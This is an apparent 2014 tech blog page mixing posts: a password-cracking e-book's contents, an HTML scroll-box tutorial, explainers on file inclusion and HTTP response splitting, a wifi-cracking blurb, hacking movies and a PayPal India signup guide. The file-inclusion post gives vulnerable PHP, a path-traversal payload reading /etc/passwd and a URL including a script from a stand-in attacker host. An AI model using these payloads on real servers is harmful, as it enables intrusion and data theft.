No 1 tech

Sunday, April 13, 2014

Cracking Passwords Guide

This document is for people who want to learn to the how and why of password cracking. There is a lot of information being presented and you should READ IT ALL BEFORE you attempted doing anything documented here. I do my best to provide step by step instructions along with the reasons for doing it this way. Other times I will point to a particular website where you find the information. In those cases someone else has done what I attempting and did a good or great job and I did not want to steal their hard work. These instructions have several excerpts from a combination of posts from pureh@te, granger53, showsgeek, PrairieFire, RaginRob, stasik, and Solar Designer. I would also like to thank each of them and others for the help they have provided me on the BackTrack forum.

Type: E-Book

Contents
1 LM vs. NTLM
2 Syskey
3 Cracking Windows Passwords
3.1 Extracting the hashes from the Windows SAM
3.1.1 Using BackTrack Tools
3.1.1.1 Using bkhive and samdump v1.1.1 (BT2 and BT3)
3.1.1.2 Using samdump2 v2.0.1 (BT4)
3.1.1.3 Cached Credentials
3.1.2 Using Windows Tools
3.1.2.1 Using fgdump
3.1.2.2 Using gsecdump
3.1.2.3 Using pwdump7
3.1.2.4 Cached Credentials
3.2 Extracting the hashes from the Windows SAM remotely
3.2.1 Using BackTrack Tools
3.2.1.1 ettercap
3.2.2 Using Windows Tools
3.2.2.1 Using fgdump
3.3 Cracking Windows Passwords
3.3.1 Using BackTrack Tools
3.3.1.1 John the Ripper BT3 and BT4
3.3.1.1.1 Cracking the LM hash
3.3.1.1.2 Cracking the NTLM hash
3.3.1.1.3 Cracking the NTLM using the cracked LM hash
3.3.1.1.4 Cracking cached credentials
3.3.1.2 John the Ripper - current
3.3.1.2.1 Get and Compile
3.3.1.2.2 Cracking the LM hash
3.3.1.2.3 Cracking the LM hash using known letter(s) in known location(s) (knownforce)
3.3.1.2.4 Cracking the NTLM hash
3.3.1.2.5 Cracking the NTLM hash using the cracked LM hash (dumbforce)
3.3.1.2.6 Cracking cached credentials
3.3.1.3 Using MDCrack
3.3.1.3.1 Cracking the LM hash
3.3.1.3.2 Cracking the NTLM hash
3.3.1.3.3 Cracking the NTLM hash using the cracked LM hash
3.3.1.4 Using Ophcrack
3.3.1.4.1 Cracking the LM hash
3.3.1.4.2 Cracking the NTLM hash
3.3.1.4.3 Cracking the NTLM hash using the cracked LM hash
3.3.2 Using Windows Tools
3.3.2.1 John the Ripper
3.3.2.1.1 Cracking the LM hash
3.3.2.1.2 Cracking the NTLM hash
3.3.2.1.3 Cracking the NTLM hash using the cracked LM hash
3.3.2.1.4 Cracking cached credentials
3.3.2.2 Using MDCrack
3.3.2.2.1 Cracking the LM hash
3.3.2.2.2 Cracking the NTLM hash
3.3.2.2.3 Cracking the NTLM hash using the cracked LM hash
3.3.2.3 Using Ophcrack
3.3.2.3.1 Cracking the LM hash
3.3.2.3.2 Cracking the NTLM hash
3.3.2.3.3 Cracking the NTLM hash using the cracked LM hash
3.3.2.4 Using Cain and Abel
3.3.3 Using a Live CD
3.3.3.1 Ophcrack
4. Changing Windows Passwords
4.1 Changing Local User Passwords
4.1.1 Using BackTrack Tools
4.1.1.1 chntpw
4.1.2 Using a Live CD
4.1.2.1 chntpw
4.1.2.2 System Rescue CD
4.2 Changing Active Directory Passwords
5 plain-text.info
6 Cracking Novell NetWare Passwords
7 Cracking Linux/Unix Passwords
8 Cracking networking equipment passwords
8.1 Using BackTrack tools
8.1.1 Using Hydra
8.1.2 Using Xhydra
8.1.3 Using Medusa
8.1.4 Using John the Ripper to crack a Cisco hash
8.2 Using Windows tools
8.2.1 Using Brutus
9 Cracking Applications
9.1 Cracking Oracle 11g (sha1)
9.2 Cracking Oracle passwords over the wire
9.3 Cracking Office passwords
9.4 Cracking tar passwords
9.5 Cracking zip passwords
9.6 Cracking pdf passwords
10 Wordlists aka Dictionary attack
10.1 Using John the Ripper to generate a wordlist
10.2 Configuring John the Ripper to use a wordlist
10.3 Using crunch to generate a wordlist
10.4 Generate a wordlist from a textfile or website
10.5 Using premade wordlists
10.6 Other wordlist generators
10.7 Manipulating your wordlist
11 Rainbow Tables
11.1 What are they?
11.2 Generating your own
11.2.1 rcrack - obsolete but works
11.2.2 rcracki
11.2.3 rcracki - boinc client
11.2.4 Generating a rainbow table
11.3 WEP cracking
11.4 WPA-PSK
11.4.1 airolib
11.4.2 pyrit
12 Distributed Password cracking
12.1 john
12.2 medussa (not a typo this is not medusa)
13 using a GPU
13.1 cuda - nvidia
13.2 stream - ati
14 example hash.txt

Like it ? Share it.

Create HTML Scroll Box on Blogger for Post

We are going to learn How we can create different type of HTML Scroll box for our blogger's post.

Why need it ? - If you are blogger and if you want to show some kind of script code to your readers then this is very useful for you. Scroll box is very handy when you have a lot of data or text but limited space to display them. Besides text, the scroll box can contain images and HTML codes too! And, it's so easy to create one that can be located within your blog post or pages and even at the sidebar, footer or below a header for announcement and the like! It helps to save valuable space in your blog.

Different Type of HTML Scroll Box Code:

1. Most Simple Scroll Box Code :

<center><div style="text-align:left;width:150px;height:150px;overflow:scroll;padding:5px;">
WRITE YOUR TEXT HERE.
</div>
</center>

How to Do :
A. First of all Copy the above code then Create a New Post. Click on HTML then Paste the above code

(Click on image for large view)

B. Click on Compose and Edit the Text as per your requirement

(Click on Image for large view)

Editing The Code :

text-align:left - Your text will be start from left side. You can change it in center and right.

width:150px - If you want to change width of your scroll box just replace size of width as per your requirement. For Example width:400px

height:150px - If you want to change height of your scroll box just replace size of height as per your requirement. For Example height:300px

overflow:scroll - To tell the browser to add scrollbars to the box.

Changing Text - You can change your Text style color etc by using your blogger toolbar.

2. Auto Scrollbars - In the above example we used overflow:scroll to add scrollbars to the box. Another option is to use overflow:auto.

By using overflow:auto, the box will only grow scrollbars if the contents are too big to fit inside. In other words, scrollbars will only appear when they're needed.

Code A : Small line of Text so you will unable to see scrollbar with output

<center>
<div style="text-align:left;width:250px;height:150px;overflow:auto;padding:5px;">
One small line of text by geekyshow.
</div>
</center>

How to Do : Method is same as I have explained in 1st code
Output : This is our output as you can see there is no scrollbar because we have small line of text.

Code B : More Text of lines so this we will create a scrollbar automatically. see the output

<center>
<div style="text-align:left;width:150px;height:50px;overflow:auto;padding:5px;">
This contains more text of line than the previous one. Because there's too much text to fit into the box, the box grows scrollbars. by geekyshow.
</div>
</center>

How to Do : Method is same as I have explained in 1st code
Output : This is our output as you can see there is scrollbar because we have more line of text.

3. Scroll Box With color and border

Code :

<center>
<div style="text-align:left;width:300px;height:150px;overflow:scroll;padding:5px;background-color:#FCFADD;color:#714D03;border:4px double #DEBB07;">
WRITE YOUR TEXT HERE BY GEEKYSHOWS.
</div>
</center>

How to Do : Method is same as I have explained in 1st code
Output : This is our scroll box with color and border.

Editing Code :

background-color:#FCFADD - If you want to change your background color simply replace #FCFADD code with your own color code. For more color code Click Here

color:#714D03 - If you want to change Text color simply replace #714D03 with your own color code.

border:4px double #DEBB07 - You can resize your border.

Like it ? Share it.

Friday, April 11, 2014

File Inclusion

File inclusion attack is an attack in which an attacker can execute a file in a webpage. This type of attack can happen due to the improper filtering of user data supplied. Due to this vulnerability the attacker can execute script, stole data. By leveraging the vulnerability in PHP an attacker can execute command to do different attacks.
File inclusion attack are of two type :

Local File Inclusion.
Remote File Inclusion.

Local File Inclusion (LFI)

In LFI the attacker can take the advantage of improper filtering and can take advantage. The following PHP vulnerable to LFI :

<?php
$file = $_GET['file'];
if(isset($file))
{
include(“pages/$file”);
}
else
{
include(“index.php”);
}
?>

The original request will look like this:
http://www.test.com/index.php?id =contact.php
The attacker will execute the following script:
http://www.test.com/index.php?id =../../../../etc/passwd
This will give the password on the server
The countermeasure of this attack is to modify the php $file variable script as follows:
$file = str_replace(‘../’, ‘ ’, $_GET[‘file’]);
The LFI attack will not work after replacing above line.

Remote File Inclusion (RFI)

Remote File Inclusion (RFI) is an attack that targets the computer servers that run Web sites and their applications. RFI exploits are most often attributed to the PHP programming language used by many large firms including Facebook and SugarCRM. However, RFI can manifest itself in other environments and was in fact introduced initially as "SHTML injection". RFI works by exploiting applications that dynamically reference external scripts indicated by user input without proper sanitation. As a consequence, the application can be instructed to include a script hosted on a remote server and thus execute code controlled by an attacker. The executed scripts can be used for temporary data theft or manipulation, or for a long term takeover of the vulnerable server.
Remote File Inclusion (RFI) is caused by insufficient validation of user input provided as parameters to a Web application. Parameters that are vulnerable to RFI enable an attacker to include code from a remotely hosted file in a script executed on the application’s server. Since the attacker’s code is thus executed on the Web server it might be used for temporary data theft or manipulation, or for a long term takeover of the vulnerable server.
The RFI attack vector includes a URL reference to the remotely hosted code. Most attacks include two steps.

In the first step, the attack vector references a simple validation script, usually capable of printing some distinguished output to the HTML page. If the validation script is successfully executed by the server under attack,
The attacker proceeds with a second vector that references the actual payload script. The servers hosting the script are either compromised servers or file sharing services.

The remote file inclusion attack allow an attacker to execute from anywhere a malicious file/script.
The vulnerability exploit the poor validation checks in websites and can eventually lead to code execution on server or code execution on website. With RFL attack an attacker can get access of the server.
Let the vulnerable page is :
http://www.test.com/index.php?page =office
This web page is getting a document in the text format from server which include php include function to get the page.
The attacker can execute a script instead of the genuine page as follows:
http://www.test.com/index.php?page =http://www.hackersite.com/maliciousscript.txt

Preventing File Inclusions (RFI - LFI) Vulnerabilities

The most common protection mechanism against RFI attacks is based on signatures for known vulnerabilities in the Web Application Firewall (WAF). Detection and blocking of such attacks can be enhanced by creating a blacklist of attack sources and a black-list of URLs of remotely included malicious scripts:

Advanced knowledge of RFI attack sources enables the WAF to block an attack before it even begins.
A blacklist of the referenced URL enables the WAF to block exploits targeting zero-day vulnerabilities of applications.
The blacklist of IPs constructed from the RFI attack observations could be used to block other types of attacks issued from the same malicious sources.

Like it ? Share it.

Tuesday, April 8, 2014

N00bs Wifi Cracking

Type: E-Book

In the beginning of wifi communication WEP (Wired equivalent protection) was the only encryption a wireless network user had to choose from. Which at the time was great, because no tools existed to break it. However less then a year after WiFi became mainstream tools began to emerge making cracking wep encryption possible. The first tools where command line and it could take a very long time to crack. Now days WEP and WPS (Wireless Protected Setup) Have become 100% crackable. WEP taking only minutes most times and WPS taking anywhere from a few seconds to a day or two. The only standing security for “consumer” Wifi now falls to WPA/WPA2 (Wireless Protected Access) However even that can be cracked IF you have what it takes.

Like it ? Share it.

Key Match: How to Hack wifi, How to Crack wifi password, How to find wifi password, wifi password cracking, wifi password finder, wifi hack

Friday, April 4, 2014

HTTP response splitting

HTTP response splitting is a form of web application vulnerability, resulting from the failure of the application or its environment to properly sanitize input values. It can be used to perform cross-site scripting attacks, cross-user defacement, web cache poisoning, and similar exploits.

The attack consists of making the server print a carriage return (CR, ASCII 0x0D) line feed (LF, ASCII 0x0A) sequence followed by content supplied by the attacker in the header section of its response, typically by including them in input fields sent to the application. Per the HTTP standard (RFC 2616), headers are separated by one CRLF and the response's headers are separated from its body by two. Therefore, the failure to remove CRs and LFs allows the attacker to set arbitrary headers, take control of the body, or break the response into two or more separate responses—hence the name.

CRLF Injection

CRLF refers to the special character elements "Carriage Return" and "Line Feed". These elements are embedded in HTTP headers and other software code to signify an End of Line (EOL) marker. Many internet protocols, including MIME (e-mail), NNTP (newsgroups) and more importantly HTTP use CRLF sequences to split text streams into discrete elements. Web application developers split HTTP and other headers based on where CRLF is located. Exploits occur when an attacker is able to inject a CRLF sequence into an HTTP stream. By introducing this unexpected CRLF injection, the attacker is able to maliciously exploit CRLF vulnerabilities in order to manipulate the web application's functions.
A more formal name for CRLF Injection is Improper Neutralization of CRLF Sequences. Because CRLF injection is frequently used to split HTTP responses, it can also be designated as HTTP Response Splitting or Improper Neutralization of CRLF Sequences in HTTP Headers.

Key Concepts of CRLF Injection

CRLF Injection is a software application coding vulnerability that occurs when an attacker injects a CRLF character sequence where it is not expected. When CRLF Injection is used to split a HTTP response header it is referred to as HTTP Response Splitting. CRLF Injection vulnerabilities result from data input that is not neutralized, incorrectly neutralized, or otherwise unsanitized.
Attackers provide specially crafted text streams with CRLF injections in order to trick the web application to perform unexpected and potentially harmful actions ranging from medium to high severity. Attackers exploit the CRLF Injection vulnerability by injecting CRLF sequences in order to split a text stream to embed text sequences that the web application is not expecting. These unexpected CRLF injections can result in a security breach and cause material harm.
CRLF Injection exploits security vulnerabilities at the application layer. By exploting the CRLF Injection flaw in an HTTP response for example, attackers can modify application data compromising integrity and enabling the exploitation of the following vulnerabilities:

XSS or Cross Site Sripting vulnerabilities
Proxy and web server cache poisoning
Web site defacement
Hijacking the client's session
Client web browser poisoning

Explaining CRLF Injection Through Examples

Let's examine how CRLF Injections cause damage by looking at one of the most basic example of a CRLF attack: adding fake entries into log files. Suppose a vulnerable application accepts unsanitized or improperly neutralized data and writes it to a system log file. An attacker supplies the following input:

Because this error is fake, a sysadmin may waste a lot of time troubleshooting a non-existent error. An attacker could use this type of Trojan to distract the admin while attacking the system somewhere else.
Another way to illustrate how CRLF Injections can cause severe harm is through an application that accepts a file name as user input and then executes a relatively harmless command on that file such as "ls –a ." If the application is vulnerable to CRLF injection because of improperly neutralized or unsanitized data input, an attacker could provide the following input:

This CRLF Injection attack could wipe out the entire file system if the application were running with root privileges on a linux/unix system!

Preventing HTTP Response Splitting Vulnerabilities

Fortunately, HTTP response splitting are easy to prevent:
Always follow the rule of never trusting user input
Sanitize and neutralize all user supplied data or properly encode output in HTTP headers that would otherwise be visible to users in order to prevent the injection of CRLF sequences and their consequences.

Like it ? Share it.

Wednesday, April 2, 2014

Movies Based on Hacking

In this post we are going to share with you Hacking movies. You can say Top Hacker Movies List. Every hacker should watch these movies. You will really enjoy these movies.

Die Hard 4: Live Free or Die Hard (2007)

Hackers (1995)

Antitrust (2001)

Pirates of Silicon Valley (1999)

The Italian Job (2003)

The Net 2.0 (2006)

Untraceable (2008)

Foolproof (2003)

Firewall (2006)

The Score (2001)

Swordfish (2001)

Sneakers (1992)

The Social Network (2010)

Takedown (2000)

2001: A Space Odyssey (1968)

The Computer Wore Tennis Shoes (1969)

War Games (1983)

Prime Risk (1985)

The Net (1995)

Ghost in the Shell (1995)

23 (1998)

Webmaster (1998) / Skyggen (1998)

Office Space (1999)

The Thirteenth Floor (1999)

eXistenZ (1999)

Code Hunter/Storm Watch (2002)

One Point O (or) Paranoia 1.0 (2004)

Deja Vu (2006)

War Games : The Dead Code (2008)

Underground: The Julian Assange Story (2012)

The Girl with the Dragon Tattoo (2009)

Top Hackers Movie Hacker's Movie Top 31 Hacker's Movie The Best Hacker Movies Movies Every Hacker Should See Top Hollywood Movies on Hacking Computer Geek Movies

Like it ? Share it.

Tuesday, April 1, 2014

How to Open Paypal account in India

What is Paypal?
PayPal is the faster, safer way to pay and get paid online, via a mobile device and in store. The service gives people simpler ways to send money without sharing financial information, and with the flexibility to pay using their account balances, bank accounts, credit cards or promotional financing. With 143 million active accounts in 193 markets and 26 currencies around the world, PayPal enables global commerce, processing more than 9 million payments every day. Because PayPal helps people transact anytime, anywhere and in any way, the company is a driving force behind the growth of mobile commerce and processed $27 billion in mobile payments in 2013. PayPal is an eBay (Nasdaq:EBAY) company and contributed 41 percent of eBay Inc.'s revenues in 2013. PayPal is headquartered in San Jose, Calif. and its international headquarters is located in Singapore.

As of March 2011, PayPal made changes to the User Agreement for Indian users to comply with Reserve Bank of India regulations. Notable changes to the agreement were:

Any balance or future payments must not be used to buy goods or services but transferred to a bank account. The PayPal balance is automatically withdrawn to the bank account.
PayPal balance cannot be used to make purchases. Credit/Debit cards linked with the PayPal account must be used to pay through PayPal.

The per transaction limit had been set to USD 3000, since October 14, 2011. However, on July 29, 2013 PayPal has increased the per transaction limit to USD 10,000. This brings the per transaction limit for India in line with the restrictions imposed by PayPal on most other countries.
PayPal has disabled sending and receiving personal payments in India, thus forcing all recipients to pay a transaction fee.
PayPal wants to make India an incubation center for the company's employee engagement policies. In 2012, PayPal hired 120 people for its offices in Chennai and Bangalore. PayPal plans to recruit 1000 candidates for its Bangalore Development center.

What You need for Creating a Paypal Account:

PAN Card
An Active Email ID
Bank Details with IFSC Code

Where I can get my Bank IFSC Code ?

You can ask to your bank for their IFSC code.
If you have cheque Book see carefully there is Your Bank's IFSC code
Search Online
http://www.ifsccodebank.com
http://www.bankifsccode.com

Is there any charge for creating paypal account?

NO, Its Free of cost.

How to setup a Paypal Account :

1. Go to Paypal official site www.paypal.com and Click on Sign UP

(Click on image for large view)

2. Select Your Country and Click on Get Started Under the An account for Individuals.

3. Now fill the form completely. Details should be according to your Pan card and Bank details. This is will you to verify your Paypal account in the future. After filling the form Click on Agree and Create Account.

4. In this screen fill the Code as shown and click on Continue.

5. In this screen you do not need to fill up your credit/debit card details. Simply click on Go to My account

6. In this step Click on Add Bank

7. Fill up this form according to your bank details and click on Continue

8. Now Click on Purpose Code link. You will see this screen here Select Advertising and market research and click on Save

(Click on image for large view)

9. Its Done for Now but after some days you will receive two small amounts in your bank account. It takes around 7 days maximum. So, Whenever your account will be credit with those amount come to your paypal account and fill those amounts in the specific field. If everything is OK your account will be verify.

Like it ? Share it.